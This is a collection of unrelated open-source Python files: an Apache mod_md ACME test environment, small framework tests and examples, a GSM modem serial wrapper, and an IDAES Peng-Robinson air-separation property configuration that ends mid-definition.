self._acme_eab_url = None
else:
raise Exception(f"unknown ACME server type: {self._acme_server}")
self._acme_server_down = False
self._acme_server_ok = False
self._a2md_bin = os.path.join(self.bin_dir, 'a2md')
self._default_domain = f"test1.{self.http_tld}"
self._store_dir = "./md"
self.set_store_dir_default()
self.add_cert_specs([
CertificateSpec(domains=[f"expired.{self._http_tld}"],
valid_from=timedelta(days=-100),
valid_to=timedelta(days=-10)),
CertificateSpec(domains=["localhost"], key_type='rsa2048'),
])
self.httpd_error_log.set_ignored_lognos([
#"AH10045", # mod_md complains that there is no vhost for an MDomain
"AH10105", # mod_md does not find a vhost with SSL enabled for an MDomain
"AH10085" # mod_ssl complains about fallback certificates
])
if self.lacks_ocsp():
self.httpd_error_log.set_ignored_patterns([
re.compile(r'.*certificate with serial \S+ has no OCSP responder URL.*'),
])
if setup_dirs:
self._setup = MDTestSetup(env=self)
self._setup.make()
self.issue_certs()
self.clear_store()
def set_store_dir_default(self):
dirpath = "md"
if self.httpd_is_at_least("2.5.0"):
dirpath = os.path.join("state", dirpath)
self.set_store_dir(dirpath)
def set_store_dir(self, dirpath):
self._store_dir = os.path.join(self.server_dir, dirpath)
if self.acme_url:
self.a2md_stdargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile, "-j"])
self.a2md_rawargs([self.a2md_bin, "-a", self.acme_url, "-d", self._store_dir, "-C", self.acme_ca_pemfile])
def get_apxs_var(self, name: str) -> str:
p = subprocess.run([self._apxs, "-q", name], capture_output=True, text=True)
if p.returncode != 0:
return ""
return p.stdout.strip()
@property
def acme_server(self):
return self._acme_server
@property
def acme_url(self):
return self._acme_url
@property
def acme_tos(self):
return self._acme_tos
@property
def a2md_bin(self):
return self._a2md_bin
@property
def acme_ca_pemfile(self):
return self._acme_ca_pemfile
@property
def store_dir(self):
return self._store_dir
def get_request_domain(self, request):
return "%s-%s" % (re.sub(r'[_]', '-', request.node.originalname), MDTestEnv.DOMAIN_SUFFIX)
def get_method_domain(self, method):
return "%s-%s" % (re.sub(r'[_]', '-', method.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
def get_module_domain(self, module):
return "%s-%s" % (re.sub(r'[_]', '-', module.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
def get_class_domain(self, c):
return "%s-%s" % (re.sub(r'[_]', '-', c.__name__.lower()), MDTestEnv.DOMAIN_SUFFIX)
# --------- cmd execution ---------
_a2md_args = []
_a2md_args_raw = []
def a2md_stdargs(self, args):
self._a2md_args = [] + args
def a2md_rawargs(self, args):
self._a2md_args_raw = [] + args
def a2md(self, args, raw=False) -> ExecResult:
preargs = self._a2md_args
if raw:
preargs = self._a2md_args_raw
log.debug("running: {0} {1}".format(preargs, args))
return self.run(preargs + args)
def check_acme(self):
if self._acme_server_ok:
return True
if self._acme_server_down:
pytest.skip(msg="ACME server not running")
return False
if self.is_live(self.acme_url, timeout=timedelta(seconds=0.5)):
self._acme_server_ok = True
return True
else:
self._acme_server_down = True
pytest.fail(msg="ACME server not running", pytrace=False)
return False
def get_ca_pem_file(self, hostname: str) -> Optional[str]:
pem_file = super().get_ca_pem_file(hostname)
if pem_file is None:
pem_file = self.acme_ca_pemfile
return pem_file
# --------- access local store ---------
def purge_store(self):
log.debug("purge store dir: %s" % self._store_dir)
assert len(self._store_dir) > 1
if os.path.exists(self._store_dir):
shutil.rmtree(self._store_dir, ignore_errors=False)
os.makedirs(self._store_dir)
def clear_store(self):
log.debug("clear store dir: %s" % self._store_dir)
assert len(self._store_dir) > 1
if not os.path.exists(self._store_dir):
os.makedirs(self._store_dir)
for dirpath in ["challenges", "tmp", "archive", "domains", "accounts", "staging", "ocsp"]:
shutil.rmtree(os.path.join(self._store_dir, dirpath), ignore_errors=True)
def clear_ocsp_store(self):
assert len(self._store_dir) > 1
dirpath = os.path.join(self._store_dir, "ocsp")
log.debug("clear ocsp store dir: %s" % dir)
if os.path.exists(dirpath):
shutil.rmtree(dirpath, ignore_errors=True)
def authz_save(self, name, content):
dirpath = os.path.join(self._store_dir, 'staging', name)
os.makedirs(dirpath)
open(os.path.join(dirpath, 'authz.json'), "w").write(content)
def path_store_json(self):
return os.path.join(self._store_dir, 'md_store.json')
def path_account(self, acct):
return os.path.join(self._store_dir, 'accounts', acct, 'account.json')
def path_account_key(self, acct):
return os.path.join(self._store_dir, 'accounts', acct, 'account.pem')
def store_domains(self):
return os.path.join(self._store_dir, 'domains')
def store_archives(self):
return os.path.join(self._store_dir, 'archive')
def store_stagings(self):
return os.path.join(self._store_dir, 'staging')
def store_challenges(self):
return os.path.join(self._store_dir, 'challenges')
def store_domain_file(self, domain, filename):
return os.path.join(self.store_domains(), domain, filename)
def store_archived_file(self, domain, version, filename):
return os.path.join(self.store_archives(), "%s.%d" % (domain, version), filename)
def store_staged_file(self, domain, filename):
return os.path.join(self.store_stagings(), domain, filename)
def path_fallback_cert(self, domain):
return os.path.join(self._store_dir, 'domains', domain, 'fallback-pubcert.pem')
def path_job(self, domain):
return os.path.join(self._store_dir, 'staging', domain, 'job.json')
def replace_store(self, src):
shutil.rmtree(self._store_dir, ignore_errors=False)
shutil.copytree(src, self._store_dir)
def list_accounts(self):
return os.listdir(os.path.join(self._store_dir, 'accounts'))
def check_md(self, domain, md=None, state=-1, ca=None, protocol=None, agreement=None, contacts=None):
domains = None
if isinstance(domain, list):
domains = domain
domain = domains[0]
if md:
domain = md
path = self.store_domain_file(domain, 'md.json')
with open(path) as f:
md = json.load(f)
assert md
if domains:
assert md['domains'] == domains
if state >= 0:
assert md['state'] == state
if ca:
assert md['ca']['url'] == ca
if protocol:
assert md['ca']['proto'] == protocol
if agreement:
assert md['ca']['agreement'] == agreement
if contacts:
assert md['contacts'] == contacts
def pkey_fname(self, pkeyspec=None):
if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()):
return "privkey.{0}.pem".format(pkeyspec)
return 'privkey.pem'
def cert_fname(self, pkeyspec=None):
if pkeyspec and not re.match(r'^rsa( ?\d+)?$', pkeyspec.lower()):
return "pubcert.{0}.pem".format(pkeyspec)
return 'pubcert.pem'
def check_md_complete(self, domain, pkey=None):
md = self.get_md_status(domain)
assert md
assert 'state' in md, "md is unexpected: {0}".format(md)
assert md['state'] is MDTestEnv.MD_S_COMPLETE, "unexpected state: {0}".format(md['state'])
assert os.path.isfile(self.store_domain_file(domain, self.pkey_fname(pkey)))
assert os.path.isfile(self.store_domain_file(domain, self.cert_fname(pkey)))
def check_md_credentials(self, domain):
if isinstance(domain, list):
domains = domain
domain = domains[0]
else:
domains = [domain]
# check private key, validate certificate, etc
MDCertUtil.validate_privkey(self.store_domain_file(domain, 'privkey.pem'))
cert = MDCertUtil(self.store_domain_file(domain, 'pubcert.pem'))
cert.validate_cert_matches_priv_key(self.store_domain_file(domain, 'privkey.pem'))
# check SANs and CN
assert cert.get_cn() == domain
# compare lists twice in opposite directions: SAN may not respect ordering
san_list = list(cert.get_san_list())
assert len(san_list) == len(domains)
assert set(san_list).issubset(domains)
assert set(domains).issubset(san_list)
# check valid dates interval
not_before = cert.get_not_before()
not_after = cert.get_not_after()
assert not_before < datetime.now(not_before.tzinfo)
assert not_after > datetime.now(not_after.tzinfo)
# --------- check utilities ---------
def check_json_contains(self, actual, expected):
# write all expected key:value bindings to a copy of the actual data ...
# ... assert it stays unchanged
test_json = copy.deepcopy(actual)
test_json.update(expected)
assert actual == test_json
def check_file_access(self, path, exp_mask):
actual_mask = os.lstat(path).st_mode & 0o777
assert oct(actual_mask) == oct(exp_mask)
def check_dir_empty(self, path):
assert os.listdir(path) == []
def get_http_status(self, domain, path, use_https=True):
r = self.get_meta(domain, path, use_https, insecure=True)
return r.response['status']
def get_cert(self, domain, tls=None, ciphers=None):
return MDCertUtil.load_server_cert(self._httpd_addr, self.https_port,
domain, tls=tls, ciphers=ciphers)
def get_server_cert(self, domain, proto=None, ciphers=None):
args = [
"openssl", "s_client", "-status",
"-connect", "%s:%s" % (self._httpd_addr, self.https_port),
"-CAfile", self.acme_ca_pemfile,
"-servername", domain,
"-showcerts"
]
if proto is not None:
args.extend(["-{0}".format(proto)])
if ciphers is not None:
args.extend(["-cipher", ciphers])
r = self.run(args)
# noinspection PyBroadException
try:
return MDCertUtil.parse_pem_cert(r.stdout)
except:
return None
def verify_cert_key_lenghts(self, domain, pkeys):
for p in pkeys:
cert = self.get_server_cert(domain, proto="tls1_2", ciphers=p['ciphers'])
if 0 == p['keylen']:
assert cert is None
else:
assert cert, "no cert returned for cipher: {0}".format(p['ciphers'])
assert cert.get_key_length() == p['keylen'], "key length, expected {0}, got {1}".format(
p['keylen'], cert.get_key_length()
)
def get_meta(self, domain, path, use_https=True, insecure=False):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
r = self.curl_get(f"{schema}://{domain}:{port}{path}", insecure=insecure)
assert r.exit_code == 0
assert r.response
assert r.response['header']
return r
def get_content(self, domain, path, use_https=True):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
r = self.curl_get(f"{schema}://{domain}:{port}{path}")
assert r.exit_code == 0
return r.stdout
def get_json_content(self, domain, path, use_https=True, insecure=False,
debug_log=True):
schema = "https" if use_https else "http"
port = self.https_port if use_https else self.http_port
url = f"{schema}://{domain}:{port}{path}"
r = self.curl_get(url, insecure=insecure, debug_log=debug_log)
if r.exit_code != 0:
log.error(f"curl get on {url} returned {r.exit_code}"
f"\nstdout: {r.stdout}"
f"\nstderr: {r.stderr}")
assert r.exit_code == 0, r.stderr
return r.json
def get_certificate_status(self, domain) -> Dict:
return self.get_json_content(domain, "/.httpd/certificate-status", insecure=True)
def get_md_status(self, domain, via_domain=None, use_https=True, debug_log=False) -> Dict:
if via_domain is None:
via_domain = self._default_domain
return self.get_json_content(via_domain, f"/md-status/{domain}",
use_https=use_https, debug_log=debug_log)
def get_server_status(self, query="/", via_domain=None, use_https=True):
if via_domain is None:
via_domain = self._default_domain
return self.get_content(via_domain, "/server-status%s" % query, use_https=use_https)
def await_completion(self, names, must_renew=False, restart=True, timeout=60,
via_domain=None, use_https=True):
try_until = time.time() + timeout
renewals = {}
names = names.copy()
while len(names) > 0:
if time.time() >= try_until:
return False
for name in names:
mds = self.get_md_status(name, via_domain=via_domain, use_https=use_https)
if mds is None:
log.debug("not managed by md: %s" % name)
return False
if 'renewal' in mds:
renewal = mds['renewal']
renewals[name] = True
if 'finished' in renewal and renewal['finished'] is True:
if (not must_renew) or (name in renewals):
log.debug(f"domain cert was renewed: {name}")
names.remove(name)
if len(names) != 0:
time.sleep(0.1)
if restart:
time.sleep(0.1)
return self.apache_restart() == 0
return True
def is_renewing(self, name):
stat = self.get_certificate_status(name)
return 'renewal' in stat
def await_renewal(self, names, timeout=60):
try_until = time.time() + timeout
while len(names) > 0:
if time.time() >= try_until:
return False
for name in names:
md = self.get_md_status(name)
if md is None:
log.debug("not managed by md: %s" % name)
return False
if 'renewal' in md:
names.remove(name)
if len(names) != 0:
time.sleep(0.1)
return True
def await_error(self, domain, timeout=60, via_domain=None, use_https=True, errors=1):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
return False
md = self.get_md_status(domain, via_domain=via_domain, use_https=use_https)
if md:
if 'state' in md and md['state'] == MDTestEnv.MD_S_ERROR:
return md
if 'renewal' in md and 'errors' in md['renewal'] \
and md['renewal']['errors'] >= errors:
return md
time.sleep(0.1)
return None
def await_file(self, fpath, timeout=60):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
return False
if os.path.isfile(fpath):
return True
time.sleep(0.1)
def check_file_permissions(self, domain):
md = self.a2md(["list", domain]).json['output'][0]
assert md
acct = md['ca']['account']
assert acct
self.check_file_access(self.path_store_json(), 0o600)
# domains
self.check_file_access(self.store_domains(), 0o700)
self.check_file_access(os.path.join(self.store_domains(), domain), 0o700)
self.check_file_access(self.store_domain_file(domain, 'privkey.pem'), 0o600)
self.check_file_access(self.store_domain_file(domain, 'pubcert.pem'), 0o600)
self.check_file_access(self.store_domain_file(domain, 'md.json'), 0o600)
# archive
self.check_file_access(self.store_archived_file(domain, 1, 'md.json'), 0o600)
# accounts
self.check_file_access(os.path.join(self._store_dir, 'accounts'), 0o755)
self.check_file_access(os.path.join(self._store_dir, 'accounts', acct), 0o755)
self.check_file_access(self.path_account(acct), 0o644)
self.check_file_access(self.path_account_key(acct), 0o644)
# staging
self.check_file_access(self.store_stagings(), 0o755)
def get_ocsp_status(self, domain, proto=None, cipher=None, ca_file=None):
stat = {}
args = [
"openssl", "s_client", "-status",
"-connect", "%s:%s" % (self._httpd_addr, self.https_port),
"-CAfile", ca_file if ca_file else self.acme_ca_pemfile,
"-servername", domain,
"-showcerts"
]
if proto is not None:
args.extend(["-{0}".format(proto)])
if cipher is not None:
args.extend(["-cipher", cipher])
r = self.run(args, debug_log=False)
ocsp_regex = re.compile(r'OCSP response: +([^=\n]+)\n')
matches = ocsp_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['ocsp'] = m.group(1)
if 'ocsp' not in stat:
ocsp_regex = re.compile(r'OCSP Response Status:\s*(.+)')
matches = ocsp_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['ocsp'] = m.group(1)
verify_regex = re.compile(r'Verify return code:\s*(.+)')
matches = verify_regex.finditer(r.stdout)
for m in matches:
if m.group(1) != "":
stat['verify'] = m.group(1)
return stat
def await_ocsp_status(self, domain, timeout=10, ca_file=None):
try_until = time.time() + timeout
while True:
if time.time() >= try_until:
break
stat = self.get_ocsp_status(domain, ca_file=ca_file)
if 'ocsp' in stat and stat['ocsp'] != "no response sent":
return stat
time.sleep(0.1)
raise TimeoutError(f"ocsp respopnse not available: {domain}")
def create_self_signed_cert(self, name_list, valid_days, serial=1000, path=None):
dirpath = path
if not path:
dirpath = os.path.join(self.store_domains(), name_list[0])
return MDCertUtil.create_self_signed_cert(dirpath, name_list, valid_days, serial) |
tests/performance/bottle/simple_server.py | Varriount/sanic | 4,959 | 8817 | # Run with: gunicorn --workers=1 --worker-class=meinheld.gmeinheld.MeinheldWorker -b :8000 simple_server:app
import bottle
import ujson
from bottle import route, run
@route("/")
def index():
return ujson.dumps({"test": True})
app = bottle.default_app()
|
sdk/python/lib/test/langhost/future_input/__main__.py | pcen/pulumi | 12,004 | 8827 | # Copyright 2016-2018, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from pulumi import CustomResource, Output, Input
async def read_a_file_or_something():
await asyncio.sleep(0)
return "here's a file"
def assert_eq(l, r):
assert l == r
class FileResource(CustomResource):
contents: Output[str]
def __init__(self, name: str, file_contents: Input[str]) -> None:
CustomResource.__init__(self, "test:index:FileResource", name, {
"contents": file_contents
})
# read_a_file_or_something returns a coroutine when called, which needs to be scheduled
# and awaited in order to yield a value.
file_res = FileResource("file", read_a_file_or_something())
file_res.contents.apply(lambda c: assert_eq(c, "here's a file"))
|
AppPkg/Applications/Python/Python-2.7.2/Lib/lib2to3/fixes/fix_methodattrs.py | CEOALT1/RefindPlusUDK | 2,757 | 8833 | <reponame>CEOALT1/RefindPlusUDK<gh_stars>1000+
"""Fix bound method attributes (method.im_? -> method.__?__).
"""
# Author: <NAME>
# Local imports
from .. import fixer_base
from ..fixer_util import Name
MAP = {
"im_func" : "__func__",
"im_self" : "__self__",
"im_class" : "__self__.__class__"
}
class FixMethodattrs(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
power< any+ trailer< '.' attr=('im_func' | 'im_self' | 'im_class') > any* >
"""
def transform(self, node, results):
attr = results["attr"][0]
new = unicode(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
|
tests/test_misc.py | lordmauve/chopsticks | 171 | 8839 | """Tests for miscellaneous properties, such as debuggability."""
import time
from chopsticks.tunnel import Docker
from chopsticks.group import Group
def test_tunnel_repr():
"""Tunnels have a usable repr."""
tun = Docker('py36', image='python:3.6')
assert repr(tun) == "Docker('py36')"
def test_group_repr():
"""Groups have a usable repr."""
grp = Group([
Docker('py35', image='python:3.5'),
Docker('py36', image='python:3.6')
])
assert repr(grp) == "Group([Docker('py35'), Docker('py36')])"
def test_group_reuse():
"""We can re-use a group."""
grp = Group([
Docker('py35', image='python:3.5'),
Docker('py36', image='python:3.6')
])
with grp:
grp.call(time.time)
grp.call(time.time)
|
intro/matplotlib/examples/plot_good.py | zmoon/scipy-lecture-notes | 2,538 | 8883 | """
A simple, good-looking plot
===========================
Demoing some simple features of matplotlib
"""
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(5, 4), dpi=72)
axes = fig.add_axes([0.01, 0.01, .98, 0.98])
X = np.linspace(0, 2, 200)
Y = np.sin(2*np.pi*X)
plt.plot(X, Y, lw=2)
plt.ylim(-1.1, 1.1)
plt.grid()
plt.show()
|
src/backend/common/models/favorite.py | ofekashery/the-blue-alliance | 266 | 8901 | from backend.common.models.mytba import MyTBAModel
class Favorite(MyTBAModel):
"""
In order to make strongly consistent DB requests, instances of this class
should be created with a parent that is the associated Account key.
"""
def __init__(self, *args, **kwargs):
super(Favorite, self).__init__(*args, **kwargs)
|
modules/pygsm/devicewrapper.py | whanderley/eden | 205 | 8903 | <gh_stars>100-1000
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4 encoding=utf-8
# arch: pacman -S python-pyserial
# debian/ubuntu: apt-get install python-serial
import serial
import re
import errors
class DeviceWrapper(object):
def __init__(self, logger, *args, **kwargs):
self.device = serial.Serial(*args, **kwargs)
self.logger = logger
def isOpen(self):
return self.device.isOpen()
def close(self):
self.device.close()
def write(self, str):
self.device.write(str)
def _read(self, read_term=None, read_timeout=None):
"""Read from the modem (blocking) until _terminator_ is hit,
(defaults to \r\n, which reads a single "line"), and return."""
buffer = []
# if a different timeout was requested just
# for _this_ read, store and override the
# current device setting (not thread safe!)
if read_timeout is not None:
old_timeout = self.device.timeout
self.device.timeout = read_timeout
def __reset_timeout():
"""restore the device's previous timeout
setting, if we overrode it earlier."""
if read_timeout is not None:
self.device.timeout =\
old_timeout
# the default terminator reads
# until a newline is hit
if read_term is None:
read_term = "\r\n"
while(True):
buf = self.device.read()
buffer.append(buf)
# if a timeout was hit, raise an exception including the raw data that
# we've already read (in case the calling func was _expecting_ a timeout
# (wouldn't it be nice if serial.Serial.read returned None for this?)
if buf == '':
__reset_timeout()
raise(errors.GsmReadTimeoutError(buffer))
# if last n characters of the buffer match the read
# terminator, return what we've received so far
if ''.join(buffer[-len(read_term):]) == read_term:
buf_str = ''.join(buffer)
__reset_timeout()
self._log(repr(buf_str), 'read')
return buf_str
def read_lines(self, read_term=None, read_timeout=None):
"""Read from the modem (blocking) one line at a time until a response
terminator ("OK", "ERROR", or "CMx ERROR...") is hit, then return
a list containing the lines."""
buffer = []
# keep on looping until a command terminator
# is encountered. these are NOT the same as the
# "read_term" argument - only OK or ERROR is valid
while(True):
buf = self._read(
read_term=read_term,
read_timeout=read_timeout)
buf = buf.strip()
buffer.append(buf)
# most commands return OK for success, but there
# are some exceptions. we're not checking those
# here (unlike RubyGSM), because they should be
# handled when they're _expected_
if buf == "OK":
return buffer
# some errors contain useful error codes, so raise a
# proper error with a description from pygsm/errors.py
m = re.match(r"^\+(CM[ES]) ERROR: (\d+)$", buf)
if m is not None:
type, code = m.groups()
raise(errors.GsmModemError(type, int(code)))
# ...some errors are not so useful
# (at+cmee=1 should enable error codes)
if buf == "ERROR":
raise(errors.GsmModemError)
def _log(self, str, type="debug"):
if hasattr(self, "logger"):
self.logger(self, str, type) |
tests/cases/cls.py | div72/py2many | 345 | 8907 | <gh_stars>100-1000
class Foo:
def bar(self):
return "a"
if __name__ == "__main__":
f = Foo()
b = f.bar()
print(b) |
idaes/generic_models/properties/core/examples/ASU_PR.py | carldlaird/idaes-pse | 112 | 8911 | <filename>idaes/generic_models/properties/core/examples/ASU_PR.py
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Air separation phase equilibrium package using Peng-Robinson EoS.
Example property package using the Generic Property Package Framework.
This example shows how to set up a property package to do air separation
phase equilibrium in the generic framework using Peng-Robinson equation
along with methods drawn from the pre-built IDAES property libraries.
The example includes two dictionaries.
1. The dictionary named configuration contains parameters obtained from
The Properties of Gases and Liquids (1987) 4th edition and NIST.
2. The dictionary named configuration_Dowling_2015 contains parameters used in
A framework for efficient large scale equation-oriented flowsheet optimization
(2015) Dowling. The parameters are extracted from Properties of Gases and
Liquids (1977) 3rd edition for Antoine's vapor equation and acentric factors
and converted values from the Properties of Gases and Liquids (1977)
3rd edition to j.
"""
# Import Python libraries
import logging
# Import Pyomo units
from pyomo.environ import units as pyunits
# Import IDAES cores
from idaes.core import LiquidPhase, VaporPhase, Component
from idaes.generic_models.properties.core.state_definitions import FTPx
from idaes.generic_models.properties.core.eos.ceos import Cubic, CubicType
from idaes.generic_models.properties.core.phase_equil import SmoothVLE
from idaes.generic_models.properties.core.phase_equil.bubble_dew import \
LogBubbleDew
from idaes.generic_models.properties.core.phase_equil.forms import log_fugacity
from idaes.generic_models.properties.core.pure import RPP4
from idaes.generic_models.properties.core.pure import NIST
from idaes.generic_models.properties.core.pure import RPP3
# Set up logger
_log = logging.getLogger(__name__)
# ---------------------------------------------------------------------
# Configuration dictionary for a Peng-Robinson Oxygen-Argon-Nitrogen system
# Data Sources:
# [1] The Properties of Gases and Liquids (1987)
# 4th edition, Chemical Engineering Series - <NAME>
# [2] NIST, https://webbook.nist.gov/
# Retrieved 16th August, 2020
# [3] The Properties of Gases and Liquids (1987)
# 3rd edition, Chemical Engineering Series - <NAME>
# Cp parameters where converted to j in Dowling 2015
# [4] A framework for efficient large scale equation-oriented flowsheet optimization (2015)
# Computers and Chemical Engineering - <NAME>
configuration = {
# Specifying components
"components": {
"nitrogen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (34e5, pyunits.Pa), # [1]
"temperature_crit": (126.2, pyunits.K), # [1]
"omega": 0.037, # [1]
"cp_mol_ig_comp_coeff": {
"A": (3.115E1,
pyunits.J/pyunits.mol/pyunits.K), # [1]
"B": (-1.357E-2,
pyunits.J/pyunits.mol/pyunits.K**2),
"C": (2.680E-5,
pyunits.J/pyunits.mol/pyunits.K**3),
"D": (-1.168E-8,
pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
191.61, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
"A": (3.7362, None), # [2]
"B": (264.651, pyunits.K),
"C": (-6.788, pyunits.K)}}},
"argon": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (39.948E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (48.98e5, pyunits.Pa), # [1]
"temperature_crit": (150.86, pyunits.K), # [1]
"omega": 0.001, # [1]
"cp_mol_ig_comp_coeff": {
"A": (2.050E1,
pyunits.J/pyunits.mol/pyunits.K), # [1]
"B": (0.0, pyunits.J/pyunits.mol/pyunits.K**2),
"C": (0.0, pyunits.J/pyunits.mol/pyunits.K**3),
"D": (0.0, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
154.8, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {"A": (3.29555, None), # [2]
"B": (215.24, pyunits.K),
"C": (-22.233, pyunits.K)}}},
"oxygen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (31.999E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (50.43e5, pyunits.Pa), # [1]
"temperature_crit": (154.58, pyunits.K), # [1]
"omega": 0.025, # [1]
"cp_mol_ig_comp_coeff": {
"A": (2.811E1, pyunits.J/pyunits.mol/pyunits.K),
"B": (-3.680E-6,
pyunits.J/pyunits.mol/pyunits.K**2),
"C": (1.746E-5, pyunits.J/pyunits.mol/pyunits.K**3),
"D": (-1.065E-8,
pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
205.152, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
"A": (3.85845, None), # [2]
"B": (325.675, pyunits.K),
"C": (-5.667, pyunits.K)}}}},
# Specifying phases
"phases": {"Liq": {"type": LiquidPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}},
"Vap": {"type": VaporPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}}},
# Set base units of measurement
"base_units": {"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K},
# Specifying state definition
"state_definition": FTPx,
"state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s),
"temperature": (10, 300, 350, pyunits.K),
"pressure": (5e4, 1e5, 1e7, pyunits.Pa)},
"pressure_ref": (101325, pyunits.Pa),
"temperature_ref": (298.15, pyunits.K),
# Defining phase equilibria
"phases_in_equilibrium": [("Vap", "Liq")],
"phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE},
"bubble_dew_method": LogBubbleDew,
"parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000,
("nitrogen", "argon"): -0.26e-2,
("nitrogen", "oxygen"): -0.119e-1,
("argon", "nitrogen"): -0.26e-2,
("argon", "argon"): 0.000,
("argon", "oxygen"): 0.104e-1,
("oxygen", "nitrogen"): -0.119e-1,
("oxygen", "argon"): 0.104e-1,
("oxygen", "oxygen"): 0.000}}}
configuration_Dowling_2015 = {
# Specifying components
"components": {
"nitrogen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (33.943875e5, pyunits.Pa), # [4]
"temperature_crit": (126.2, pyunits.K), # [4]
"omega": 0.04, # [3]
"cp_mol_ig_comp_coeff": {
'A': (3.112896E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-1.356E-2, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (2.6878E-5, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (-1.167E-8, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
191.61, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
'A': (14.9342, None), # [3]
'B': (588.72, pyunits.K),
'C': (-6.60, pyunits.K)}}},
"argon": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (39.948E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (48.737325e5, pyunits.Pa), # [4]
"temperature_crit": (150.86, pyunits.K), # [4]
"omega": -0.004, # [1]
"cp_mol_ig_comp_coeff": {
'A': (2.0790296E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-3.209E-05, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (5.163E-08, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (0.0, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [3]
"entr_mol_form_vap_comp_ref": (
154.8, pyunits.J/pyunits.mol/pyunits.K), # [3]
"pressure_sat_comp_coeff": {
'A': (15.2330, None), # [3]
'B': (700.51, pyunits.K),
'C': (-5.84, pyunits.K)}}},
"oxygen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (31.999E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (50.45985e5, pyunits.Pa), # [4]
"temperature_crit": (154.58, pyunits.K), # [4]
"omega": 0.021, # [1]
"cp_mol_ig_comp_coeff": {
